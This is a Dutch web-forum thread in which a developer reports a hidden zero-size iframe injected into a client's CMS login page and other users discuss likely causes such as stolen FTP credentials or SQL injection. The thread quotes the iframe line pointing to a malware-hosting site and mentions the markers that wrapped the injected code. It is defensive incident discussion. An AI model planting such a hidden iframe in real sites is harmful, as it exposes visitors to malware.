verdachte iframe

Pagina: 1
Acties:

Acties:
  • 0 Henk 'm!

• Noctonix
  • Registratie: Februari 2012
  • Laatst online: 02-07 16:26
Hallo!

Ik krijg van mijn werkgever te horen dat een van de website's door ons gemaakt, dat er op de beheer login pagina 2 iframes staan met een link die verwijzen naar een website waar volgens kaspersky malware te vinden is.

het gaat om de volgende code:
code:
1
<iframe width="0" height="0" border="0" src="http://werkendwachtik.nl/afbeeldingen/news.php">

De klant is de enige die het wachtwoord weet, en er is verder niets op de server gezet door personeel.
Momenteel kan ik niet in de FTP om te controleren wanneer de bestanden zijn aangetast en hoeveel het er zijn omdat de provider waar de site gehost staat de ftp gegevens opnieuw genereert en toestuurt.

Iemand enig idee waar en hoe deze code op de website zou zijn gekomen? sql injection maby?

Freedom for everyone..

Acties:
  • 0 Henk 'm!

• Releases
  • Registratie: Maart 2009
  • Laatst online: 17:02

Releases

Ja maar!

Zal wel komen door een gelekt FTP gebruikersnaam en wachtwoord. Kan prima gebeuren doormiddel van een keylogger of stealer.
Eventueel een plugin die een lek heeft op de website?

Acties:
  • 0 Henk 'm!

• Noctonix
we maken gebruik van een eigen cms systeem. wat achter een versleutelde pagina zit.
Ook hebben we een WYSIWYG editor, maar die is alleen beschikbaar achter het cms..

verder op de site (voorkant) komt het iframe nergens voor.
Alleen op de beheer pagina.

Ik heb nog niet ingelogd wegens veiligheidsrisico.

Freedom for everyone..

Acties:
  • 0 Henk 'm!

• SKiLLa
  • Registratie: Februari 2002
  • Niet online

SKiLLa

Byte or nibble a bit ?

Injection is goed mogelijk. Maar kan ook gewoon met FTP gebeurd zijn. Ik zou in ieder geval de klant informeren en z'n wachtwoord resetten en dan de CMS en FTP logfiles naspitten ...

'Political Correctness is fascism pretending to be good manners.' - George Carlin

Acties:
  • 0 Henk 'm!

• Noctonix
SKiLLa schreef op dinsdag 09 oktober 2012 @ 16:57:
Injection is goed mogelijk. Maar kan ook gewoon met FTP gebeurd zijn. Ik zou in ieder geval de klant informeren en z'n wachtwoord resetten en dan de CMS en FTP logfiles naspitten ...
Ik heb net op de server gekeken via FTP, en er zijn meerdere bestanden aangepast op dezelfde datum en tijd. en hier bevind de volgende code:

Afbeeldingslocatie: http://sleekupload.com/uploads/5/infected2a.jpg

Het probleem is nu verholpen.
De wachtwoorden voor de ftp en het cms zijn gewijzigd.

Nu hopen dat het zich niet nog een keer voordoet!

EDIT:

Zo te zien blijk #c3284d# #/c3284d# waar de schadelijke code tussen staat vaker voor te komen op internet!

[ Voor 8% gewijzigd door Noctonix op 10-10-2012 10:47 ]

Freedom for everyone..